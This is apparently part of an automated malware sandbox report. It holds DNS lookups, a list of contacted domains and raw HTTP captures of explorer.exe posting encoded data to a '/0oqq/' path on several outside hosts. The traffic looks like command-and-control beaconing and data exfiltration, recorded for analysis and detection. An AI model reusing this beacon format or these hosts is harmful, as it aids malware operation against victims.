                                                                                                                      Mar 20, 2023 09:11:11.017399073 CET8.8.8.8192.168.2.30xd22Server failure (2)www.themssterofssuepnse.restnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:11:37.163110971 CET8.8.8.8192.168.2.30x528Server failure (2)www.brennmansoluciones.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:11:38.328841925 CET8.8.8.8192.168.2.30xacb9Server failure (2)www.brennmansoluciones.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Mar 20, 2023 09:11:39.494823933 CET8.8.8.8192.168.2.30x43adServer failure (2)www.brennmansoluciones.comnonenoneA (IP address)IN (0x0001)false

                                                                                                                      HTTP Request Dependency Graph

                                                                                                                      • www.hudsonandbailey.uk
                                                                                                                      • www.virginhairweave.co.uk
                                                                                                                      • www.dirdikyepedia.com
                                                                                                                      • www.g2fm.co.uk
                                                                                                                      • www.mynichemarket.co.uk
                                                                                                                      • www.landlotto.ru
                                                                                                                      • www.gorwly.top
                                                                                                                      • www.allison2patrick.online
                                                                                                                      • www.glb-mobility.com
                                                                                                                      • www.fanversewallet.com
                                                                                                                      • www.karlscurry.co.uk

                                                                                                                      HTTP Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      0192.168.2.349698199.59.243.22380C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:08:23.259864092 CET105OUTGET /0oqq/?ICHyvj5=8lDg7smsrRHQ2qUpjxtX5vXhip5hsKbS8bjyUsS5uXhQwZhytHa5U2zriYWyog0tbgqTaVuvH+VyL3+e5fQfLE/J79Vj0e1H5A==&qt9TW=60_ljPJoqo6d2 HTTP/1.1
                                                                                                                      Host: www.hudsonandbailey.uk
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                      Data Ascii:
                                                                                                                      Mar 20, 2023 09:08:23.462835073 CET106INHTTP/1.1 200 OK
                                                                                                                      Server: openresty
                                                                                                                      Date: Mon, 20 Mar 2023 08:08:23 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Set-Cookie: parking_session=9fd646de-f773-6852-2f16-a0c4b2b6c220; expires=Mon, 20-Mar-2023 08:23:23 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_EiDJt0X31b6l/t+ChrwTwo0EyKqXHdIWbOoCpUceRWn54dkUnBaAcNCk3Wbo379QDDTnF1Ih9TB9VyVqs+eUjA==
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Accept-CH: sec-ch-prefers-color-scheme
                                                                                                                      Critical-CH: sec-ch-prefers-color-scheme
                                                                                                                      Vary: sec-ch-prefers-color-scheme
                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                      Cache-Control: no-store, must-revalidate
                                                                                                                      Cache-Control: post-check=0, pre-check=0
                                                                                                                      Pragma: no-cache
                                                                                                                      Data Raw: 34 63 66 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 45 69 44 4a 74 30 58 33 31 62 36 6c 2f 74 2b 43 68 72 77 54 77 6f 30 45 79 4b 71 58 48 64 49 57 62 4f 6f 43 70 55 63 65 52 57 6e 35 34 64 6b 55 6e 42 61 41 63 4e 43 6b 33 57 62 6f 33 37 39 51 44 44 54 6e 46 31 49 68 39 54 42 39 56 79 56 71 73 2b 65 55 6a 41 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65
                                                                                                                      Data Ascii: 4cf<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_EiDJt0X31b6l/t+ChrwTwo0EyKqXHdIWbOoCpUceRWn54dkUnBaAcNCk3Wbo379QDDTnF1Ih9TB9VyVqs+eUjA=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" hre
                                                                                                                      Mar 20, 2023 09:08:23.466599941 CET107INData Raw: 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69 74
                                                                                                                      Data Ascii: f="https://www.google.com" crossorigin></head><body><div id="target" style='opacity: 0'></div><script>window.park = "eyJ1dWlkIjoiOWZkNjQ2ZGUtZjc3My02ODUyLTJmMTYtYTBjNGIyYjZjMjIwIiwicGFnZV90aW1lIjoxNjc5Mjk5NzAzLCJwYWdlX3VybCI6Imh0dHA6XC9cL3d3dy


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      1192.168.2.349700198.58.118.16780C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:08:33.861186028 CET125OUTPOST /0oqq/ HTTP/1.1
                                                                                                                      Host: www.virginhairweave.co.uk
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 189
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Origin: http://www.virginhairweave.co.uk
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Accept: */*
                                                                                                                      Referer: http://www.virginhairweave.co.uk/0oqq/
                                                                                                                      Accept-Language: en-US
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Data Raw: 49 43 48 79 76 6a 35 3d 6a 52 49 6f 70 75 49 4b 6d 35 6d 34 62 38 49 58 62 6f 44 7a 28 34 55 62 41 6f 66 54 52 54 68 4e 72 58 6f 32 6d 65 67 76 6b 74 6b 6b 47 6d 49 32 36 6f 53 63 34 4c 33 5f 47 39 37 75 4c 6e 31 75 35 4c 50 6b 56 61 62 6e 31 72 48 72 36 47 50 35 76 63 49 32 71 5f 4f 41 68 4c 38 32 4f 6d 68 37 63 36 55 36 76 52 4e 62 4f 69 5a 30 71 55 62 48 62 69 39 76 75 58 55 32 4e 61 74 75 68 4d 61 4c 73 45 49 72 47 32 79 32 4e 73 74 52 64 75 68 53 73 38 63 52 77 41 31 48 4a 66 46 45 72 78 34 4a 4e 49 69 53 6f 36 52 37 52 4d 63 70 43 72 30 31 30 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                      Data Ascii: ICHyvj5=jRIopuIKm5m4b8IXboDz(4UbAofTRThNrXo2megvktkkGmI26oSc4L3_G97uLn1u5LPkVabn1rHr6GP5vcI2q_OAhL82Omh7c6U6vRNbOiZ0qUbHbi9vuXU2NatuhMaLsEIrG2y2NstRduhSs8cRwA1HJfFErx4JNIiSo6R7RMcpCr010w).
                                                                                                                      Mar 20, 2023 09:08:34.004131079 CET125INHTTP/1.1 403 Forbidden
                                                                                                                      server: openresty/1.13.6.1
                                                                                                                      date: Mon, 20 Mar 2023 08:08:33 GMT
                                                                                                                      content-type: text/html
                                                                                                                      content-length: 175
                                                                                                                      x-fail-reason: Bad Actor
                                                                                                                      connection: close
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      10192.168.2.349709185.151.30.18180C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:09:27.782218933 CET176OUTPOST /0oqq/ HTTP/1.1
                                                                                                                      Host: www.mynichemarket.co.uk
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 189
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Origin: http://www.mynichemarket.co.uk
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Accept: */*
                                                                                                                      Referer: http://www.mynichemarket.co.uk/0oqq/
                                                                                                                      Accept-Language: en-US
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Data Raw: 49 43 48 79 76 6a 35 3d 57 4e 4b 67 70 31 48 63 4c 33 56 4e 6e 30 34 42 44 75 28 6e 6e 68 46 38 34 4f 74 79 59 4c 54 47 74 4b 74 79 64 4e 64 75 6b 37 55 43 6c 46 5a 38 79 6e 78 78 49 63 69 2d 31 6a 76 31 28 2d 7e 71 72 36 38 4d 42 6d 65 68 5a 45 4b 6c 41 4a 51 6b 70 50 35 33 54 42 70 43 67 47 58 32 58 63 47 52 54 74 58 46 35 6f 4e 75 72 75 54 48 65 62 70 4f 52 37 4c 62 5a 30 4f 4b 4e 71 62 74 4d 39 47 79 38 6b 63 6a 7a 57 47 36 4e 41 4a 32 66 4b 35 46 4a 39 6d 46 34 45 41 67 78 4b 62 6c 61 53 49 71 74 76 59 39 4a 37 4e 4c 64 30 51 4d 59 5a 78 70 74 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                      Data Ascii: ICHyvj5=WNKgp1HcL3VNn04BDu(nnhF84OtyYLTGtKtydNduk7UClFZ8ynxxIci-1jv1(-~qr68MBmehZEKlAJQkpP53TBpCgGX2XcGRTtXF5oNuruTHebpOR7LbZ0OKNqbtM9Gy8kcjzWG6NAJ2fK5FJ9mF4EAgxKblaSIqtvY9J7NLd0QMYZxptQ).
                                                                                                                      Mar 20, 2023 09:09:27.871772051 CET177INHTTP/1.1 502 Bad Gateway
                                                                                                                      content-length: 107
                                                                                                                      cache-control: no-cache
                                                                                                                      content-type: text/html
                                                                                                                      x-via: FRA1
                                                                                                                      connection: close
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 72 65 74 75 72 6e 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 20 6f 72 20 69 6e 63 6f 6d 70 6c 65 74 65 20 72 65 73 70 6f 6e 73 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <html><body><h1>502 Bad Gateway</h1>The server returned an invalid or incomplete response.</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      11192.168.2.349710185.151.30.18180C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:09:30.330507994 CET183OUTPOST /0oqq/ HTTP/1.1
                                                                                                                      Host: www.mynichemarket.co.uk
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 5337
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Origin: http://www.mynichemarket.co.uk
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Accept: */*
                                                                                                                      Referer: http://www.mynichemarket.co.uk/0oqq/
                                                                                                                      Accept-Language: en-US
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Data Raw: 49 43 48 79 76 6a 35 3d 57 4e 4b 67 70 31 48 63 4c 33 56 4e 6d 55 6b 42 47 4e 58 6e 68 42 46 39 6b 65 74 79 44 37 54 43 74 4b 68 79 64 4e 31 2d 6e 4e 73 43 69 53 64 38 31 45 56 78 4f 63 69 2d 7a 6a 76 35 37 2d 28 6f 72 2d 55 49 42 6d 4f 62 5a 48 6d 6c 50 5f 4d 6b 35 5f 35 30 66 42 70 44 6e 47 58 31 64 38 47 52 54 74 71 35 35 70 4e 59 72 75 62 48 66 70 68 4f 52 2d 66 61 59 6b 4f 4c 53 36 62 74 4d 38 36 68 38 6b 64 59 7a 57 66 68 4e 41 70 32 63 34 52 46 4d 70 79 45 78 30 41 6e 28 71 61 6e 4b 42 52 6d 6b 39 67 4a 42 49 78 7a 54 43 70 35 64 37 34 43 75 5a 48 38 46 30 70 59 69 5f 72 6b 68 4e 62 4a 62 68 50 66 78 46 38 55 35 36 4b 56 53 67 77 33 31 5a 59 61 73 50 65 39 31 45 28 7a 74 55 7e 53 49 55 7a 6c 52 4c 53 45 5a 31 4b 73 78 38 7e 32 43 71 6a 42 4f 58 32 34 50 44 4e 30 50 4f 30 6e 39 79 74 7a 30 43 51 72 50 43 49 42 67 37 28 4d 38 62 67 4d 6f 35 63 35 4c 5f 66 72 7a 61 42 44 71 63 37 5f 31 6f 7e 4b 58 58 74 30 38 6b 37 53 35 68 4f 41 43 38 33 75 52 4b 70 79 4c 6a 38 62 50 55 6c 41 59 6e 4e 74 31 6f 39 68 76 48 77 49 39 32 43 33 57 72 56 5a 70 51 7a 34 4e 75 38 35 44 6b 73 32 6e 38 6c 7a 61 51 69 45 4d 6b 41 41 32 6a 39 6c 39 36 32 6e 63 69 78 35 55 4c 30 79 4f 71 37 63 62 79 63 68 76 5a 6b 59 55 50 7e 66 51 33 61 6f 33 54 73 2d 77 4e 69 41 61 35 71 4b 7a 5f 57 55 28 7a 77 46 38 62 45 68 7a 37 70 50 4c 6a 4c 36 4a 68 68 35 67 37 59 5f 75 45 33 30 4a 4c 69 77 51 77 44 58 43 70 39 71 58 5a 5a 67 32 59 55 4a 4b 69 6f 61 4a 75 56 4e 42 4e 63 52 65 6c 49 73 30 75 63 58 58 59 62 73 58 59 64 47 43 73 61 55 70 68 4f 61 6a 7a 30 2d 57 67 50 49 7e 4e 59 78 43 65 41 77 34 43 4b 74 31 34 28 6e 64 45 38 65 65 64 28 62 55 6c 33 4a 34 35 67 53 4c 79 4c 31 75 78 50 36 76 59 33 55 30 70 58 4e 73 57 41 48 75 47 76 32 58 68 4c 69 37 6b 79 50 59 69 45 75 59 6d 79 78 55 4f 4b 73 78 68 46 31 35 4f 59 42 37 73 76 5a 63 79 43 50 68 79 62 7a 72 6c 54 54 6f 4b 79 78 6f 51 78 64 7e 34 28 65 28 4d 45 4e 78 62 48 58 64 70 48 75 6a 6e 37 4d 47 63 57 58 4b 4f 69 30 49 68 79 68 31 35 6e 79 76 79 6c 55 62 71 39 30 68 58 72 4b 46 71 6f 58 64 58 59 65 6a 7a 68 45 73 43 44 78 42 6d 4b 62 70 67 53 37 36 70 68 67 65 6c 42 67 6e 44 6f 77 76 33 62 30 56 6f 66 57 50 6d 32 78 4e 30 37 77 58 39 79 33 47 4f 7e 4b 48 38 59 6d 34 33 39 64 71 78 51 30 6c 44 49 39 6e 47 62 4e 58 48 62 61 72 45 46 58 70 54 69 66 6a 49 28 4d 57 4f 41 34 4f 75 71 62 4d 4c 66 41 68 4f 30 71 67 6f 35 76 5a 67 41 44 6d 55 56 50 53 41 49 4c 46 41 71 63 6d 6a 42 55 73 63 69 6b 46 56 70 63 6f 4a 6e 50 68 59 49 34 57 50 66 45 55 68 79 34 54 45 28 32 42 66 64 55 61 67 55 34 6d 31 38 4a 49 65 79 4a 6f 50 75 4e 33 51 51 54 4d 4e 71 69 42 66 57 66 36 44 79 46 38 52 4a 31 30 68 56 63 38 71 35 51 37 44 7a 4f 66 48 79 6a 67 35 76 67 37 4e 56 41 4b 72 61 46 75 6d 6c 53 44 4b 34 30 68 61 49 52 37 62 42 6f 57 41 28 4d 38 79 7e 66 37 37 73 36 62 47 70 44 30 6a 72 6c 28 48 57 57 68 34 59 4f 75 4f 71 63 71 32 6e 34 6f 63 34 52 59 4a 34 41 41 5f 55 44 35 43 78 4b 50 44 76 53 76 37 67 62 49 57 65 6e 57 61 44 78 6c 55 53 47 70 45 51 48 61 68 66 79 33 34 76 44 5a 4d 5a 59 37 62 44 46 56 67 61 4f 6e 6c 68 56 70 2d 35 6c 34 77 5a 6b 28 59 4a 2d 53 36 4f 51 53 35 52 45 65 55 31 32 6b 7a 68 6d 55 74 64 6c 38 39 34 4c 38 5f 65 48 42 31 58 32 37 6a 73 66 54 6b 50 36 66 37 44 70 6b 74 6c 34 53 43 33 4b 48 59 58 64 77 34 61 59 76 71 38 57 48 5f 67 43 68 58 37 67 38 75 49 55 54 6b 7e 58 4a 39 43 49 41 67 43 59 56 6f 49 33 36 63 41 30 37 6c 54 4c 6e 6a 64 34 76 58 39 6d 68 52 35 4a 41 4e 48 50 57 6a 45 34 64 52 44 6c 59 76 55 42 4a 59 75 30 33 39 76 6f 51 78 44 70 78 4f 48 50 31 76 62 62 6d 69 51 6d 63 47 53 56 55 67 63 4f 4d 45 74 68 58 6a 71 47 61 4e 58 2d 52 66 53 30 53 62 6c 65 56 34 46 78 39 34 68 32 49 71 33 31 73 35 55 54 54 67 73 61 35 4f 4d 6f 39 4f 66 6a 66 78 7a 76 38 4e 30 4c 49 4c 41 5f 55 4e 35 77 41 76 6a 6f 54 66 43 47 6c 58 7e 6e 4f 66 28 68 72 48 30 4e 48 42 63 55 62 6e 4c 4c 48 67 6e 79 30 71 70 55 50 74 76 61 34 72 63 78 61 73 75 6c 64 4f 6a 38 4d 65 41 42 5a 32 6f 79 4e 4d 43 38 70 31 5a 71 71 53 33 48 47 54 74 53 4e 77 79 4a 5a 5a 38 33 73 6f 7a 70 68 63 76 63 48 53 33 48 6e 50 77 6d 4b 63 62
                                                                                                                      Data Ascii: ICHyvj5=WNKgp1HcL3VNmUkBGNXnhBF9ketyD7TCtKhydN1-nNsCiSd81EVxOci-zjv57-(or-UIBmObZHmlP_Mk5_50fBpDnGX1d8GRTtq55pNYrubHfphOR-faYkOLS6btM86h8kdYzWfhNAp2c4RFMpyEx0An(qanKBRmk9gJBIxzTCp5d74CuZH8F0pYi_rkhNbJbhPfxF8U56KVSgw31ZYasPe91E(ztU~SIUzlRLSEZ1Ksx8~2CqjBOX24PDN0PO0n9ytz0CQrPCIBg7(M8bgMo5c5L_frzaBDqc7_1o~KXXt08k7S5hOAC83uRKpyLj8bPUlAYnNt1o9hvHwI92C3WrVZpQz4Nu85Dks2n8lzaQiEMkAA2j9l962ncix5UL0yOq7cbychvZkYUP~fQ3ao3Ts-wNiAa5qKz_WU(zwF8bEhz7pPLjL6Jhh5g7Y_uE30JLiwQwDXCp9qXZZg2YUJKioaJuVNBNcRelIs0ucXXYbsXYdGCsaUphOajz0-WgPI~NYxCeAw4CKt14(ndE8eed(bUl3J45gSLyL1uxP6vY3U0pXNsWAHuGv2XhLi7kyPYiEuYmyxUOKsxhF15OYB7svZcyCPhybzrlTToKyxoQxd~4(e(MENxbHXdpHujn7MGcWXKOi0Ihyh15nyvylUbq90hXrKFqoXdXYejzhEsCDxBmKbpgS76phgelBgnDowv3b0VofWPm2xN07wX9y3GO~KH8Ym439dqxQ0lDI9nGbNXHbarEFXpTifjI(MWOA4OuqbMLfAhO0qgo5vZgADmUVPSAILFAqcmjBUscikFVpcoJnPhYI4WPfEUhy4TE(2BfdUagU4m18JIeyJoPuN3QQTMNqiBfWf6DyF8RJ10hVc8q5Q7DzOfHyjg5vg7NVAKraFumlSDK40haIR7bBoWA(M8y~f77s6bGpD0jrl(HWWh4YOuOqcq2n4oc4RYJ4AA_UD5CxKPDvSv7gbIWenWaDxlUSGpEQHahfy34vDZMZY7bDFVgaOnlhVp-5l4wZk(YJ-S6OQS5REeU12kzhmUtdl894L8_eHB1X27jsfTkP6f7Dpktl4SC3KHYXdw4aYvq8WH_gChX7g8uIUTk~XJ9CIAgCYVoI36cA07lTLnjd4vX9mhR5JANHPWjE4dRDlYvUBJYu039voQxDpxOHP1vbbmiQmcGSVUgcOMEthXjqGaNX-RfS0SbleV4Fx94h2Iq31s5UTTgsa5OMo9Ofjfxzv8N0LILA_UN5wAvjoTfCGlX~nOf(hrH0NHBcUbnLLHgny0qpUPtva4rcxasuldOj8MeABZ2oyNMC8p1ZqqS3HGTtSNwyJZZ83sozphcvcHS3HnPwmKcb9FIYw~ZgSTJiKiNIYyrUDRmjOtj~sl76SbzuMg7~zm0XCDZzSYwkzsy7KeJ52B03iLjpsqgJTwqxxVEd8lCeI8OxsgUSOv7GKvMkWc8ZXoyFY~YqN(b(j58R7IH3C7JbryYlWdfCkT7v3b112dGltehKGyn(6NqaAVBGk0ox8L0wV5YD6c_qI6tK9Bigh43sjwU4f~W9ycSQUieaqdtHQIfm-KDLX2h~JBAizguKnLWYK8ilv3-C0YUJEr16dC4ljoa7XctQq5db6aFF5fa5mLn6ZwiPmqIsW~pRo72(tE0NtWBvuSe8zJ-mlpfPlB6~DNQAxOXxgo0f6jd(Gshzv07r3aFxypF7IfyVAG24zUceH6Rx0yKBcqK19cUG6ejgAkevsgpH89_DGDcxKmXCe9qJk(glo2fCv20vXe2HasZa3DuJwrSMxhIKQEmtPyfDyAu2UrtXaYmHY~NA4G8huC-WIfnHgNBJpFq4OU-HgvCFLcNeliIAlJ4MSbqEhzI0UWWAk(k41sCM7yyAIopujt4yg94EzL2liKTeU7hNJzsOL2oPh3yqbcJwCVc5GJ7EIw_nXCAQmk52obBCnJgng~YCVJt(wZvXDvFRC0sovPoTSdZPcrwZ77PIa2PGaaNvX3TsJ28qnb34dMdsMmkDIq2QzA1lqWOMnQYiKvjnbD1j72AYSpiqf2SQzP32o~VRIFXVSfo1nNz9nj504nh15t-npqcVshpFalC3I~tjaVNuhwXYHXs2Rm4XowsYv(lR7mZeEcPGKInUXUotwfAzEVM(xPlpTCwIylSEf6_JfVJp32-biYqv1w9e1g3kqVeBZzx7R(LT7LId68XGmt5rh3yz9Iw~Cw7mLREF6MT(vV4QapX3aidWh71EpGiFuj8ZSmm8iSiR0WftElC5nS6yAJdvOvkXbEgBsWDlRwwdDmAD4x_ECPsOxu-Pdr_kFIc8YsFfNpzniR2rS8aJcbj5zpLmITEWS5g1wale7Dqfdtafv8xAkwGq_JDPW7hvl5dVmtaGNOviTBPpYp6giWf3s~yMI0f9fvsNLMPApPEpLUZAqNFfnGyaXOKj0M4ygeGAYR3bzkfdeZH1ux0Bo5o4-FSs3n7sNo843qGN8UiV2lCrH2HIt(3XYadWy61pzfmfuDPXmlDaRUYUU5H4XAHqMZMLP7BSOpSMTvjupp23Xbc714OByYtydCAbuQaLgPGis7gYqe1AIf3yA0KXtLLvgDyWyJspKT12A2r7F8jPUyC6pXPpv1mr2c18DTc~DsCZ_(0AqAiTMv0C4EZBOtkBiBwWiS5d3V4kKQ2ZA24nm2k7Q8MHVwl8I2JuSBg(uv3EZRhMvXGc9~PUMyWc0zHRovA3WYiaAAttzEUOoqsndlQpuVJsxYmhe8YmbtuUAwTSf9kDwVzoyVMCjY7Dc(jzu4MYVHGi7i9rK28rxPZVVvb2VzhXcif(8jcLKuSjoQ8TA0zNqftiWdiexVahXzeP_m6MitBeVsE0IO4b5eVLJ9oANiJf8tgJOUmxW75AXC-L9(dXYDvOZMIwsinT0aEO_Y3TCn-KBX9tAvCRbrPbCNbykeSNmirnm0xVs1wtvnC(fbkgKKfodH2rygjqJJ4O24tjU(xZjFQEnGFqrOawU10ntgHfS5nPytZ0gOhVDU0iU2HdBx7LR1DQtoLwfUtxcF83gE5kBNP1kzkWCXA19uBccFtFHkzwZAFGGpEu821pAtMxD4gQSDVK8Ic6xslTMA9ucWqhZWczWEcTTO3F4fJ2_coRHOHZn8Rg6U3nJ41K3WsC3GBknl4nD(NEWePpZAxkJ9SPrg1e9PphEfs1jlvouPZSkd7PnFIm5CeJG8idzWKncqUoDm5OYNiNL8pVFChioJ5BY7Rjl8PxJ0LyB0dcEqVAmAR8LVfx6qhUeBACXRIZdDQNs1VKfN4WycvctQQUVV5oQw0h23PG4uK4EW4GLA7TyPxfF1fgx2wv2kHucUW81x-8x1gVseVvBPdzms6XC5BpRfhmGAIjOTYDPXLaAAMBlgh2u6QflTrUZgnUVZrS6D1kR8UfgWDkmGsKV8neadU9-F3DCw3cmOUYKIU~7hLXr5XqY4FerPf8MPFJJB1N2bjEXwz4GJ2AxXBYVFGSZfpO_Q6huX55ntBUykzDxCyRr~mfAYDRaP-hfIwUsYD9NNgDCGj(8rSkarruw7GFZ1QbFPAvJ3wFsTNhgYvb0RztAeY8tZfjhrHc4vD2eC5RP3g2rL1r_Y-smMEcXhG50YqrAAIlZwKvEFfDpn0HhVLZO8wEbq5nz7Bp7DKgM32MCslP90zWBHy~34JGxPND1WdjdEXNVOg1IocT0dGEenKbu~ruyKxBrAtJrM0c47gNf9FUVBR43qrTlFjMk55~eY0DVK4~TxZawZiWGowsDHWK1LtLblWn_vFKSociHq-3xPRCQKBRtcXN4Sdo6lGc-OFb55E4BnFvod8r3HTu-wsQ1GfiPLg5zf39pnfIWqVpOETVhodaVjFvLBwTIFAJMF-CaTIx-MNa_WR1VCNksediXnoQJCLZA8b1vzrpoyxyXRs1BtiskzBXeJ6xZvcVNsfYYZyoLMtNITVXhaRS2hmAUVJOFnKGbnQdVsais0B46O-77u2meOA02XrRc9YEJQFwJdpgWs0RADsNLG3kW66awxr4vr7pfUl74gUuoQ-cTmj9S3R5A3wL2p5kKJ9yMsjWJ1guqOk
                                                                                                                      Mar 20, 2023 09:09:30.419337034 CET183INHTTP/1.1 502 Bad Gateway
                                                                                                                      content-length: 107
                                                                                                                      cache-control: no-cache
                                                                                                                      content-type: text/html
                                                                                                                      x-via: FRA1
                                                                                                                      connection: close
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 72 65 74 75 72 6e 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 20 6f 72 20 69 6e 63 6f 6d 70 6c 65 74 65 20 72 65 73 70 6f 6e 73 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <html><body><h1>502 Bad Gateway</h1>The server returned an invalid or incomplete response.</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      12192.168.2.349711185.151.30.18180C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:09:32.876292944 CET184OUTGET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=bPiAqCboB3xuuR9jBd2d5kx4kdlhaJ3zm41TCptSu6I9zHYblFc2aOuFx07ZodW9tNkBHFGkWniHGpAg445zXTdag0fAcLuZfA== HTTP/1.1
                                                                                                                      Host: www.mynichemarket.co.uk
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                      Data Ascii:
                                                                                                                      Mar 20, 2023 09:09:32.973886013 CET185INHTTP/1.1 404 Not Found
                                                                                                                      date: Mon, 20 Mar 2023 08:09:29 GMT
                                                                                                                      content-type: text/html; charset=iso-8859-1
                                                                                                                      transfer-encoding: chunked
                                                                                                                      vary: Accept-Encoding
                                                                                                                      server: Apache
                                                                                                                      x-origin-cache-status: MISS
                                                                                                                      x-cdn-cache-status: MISS
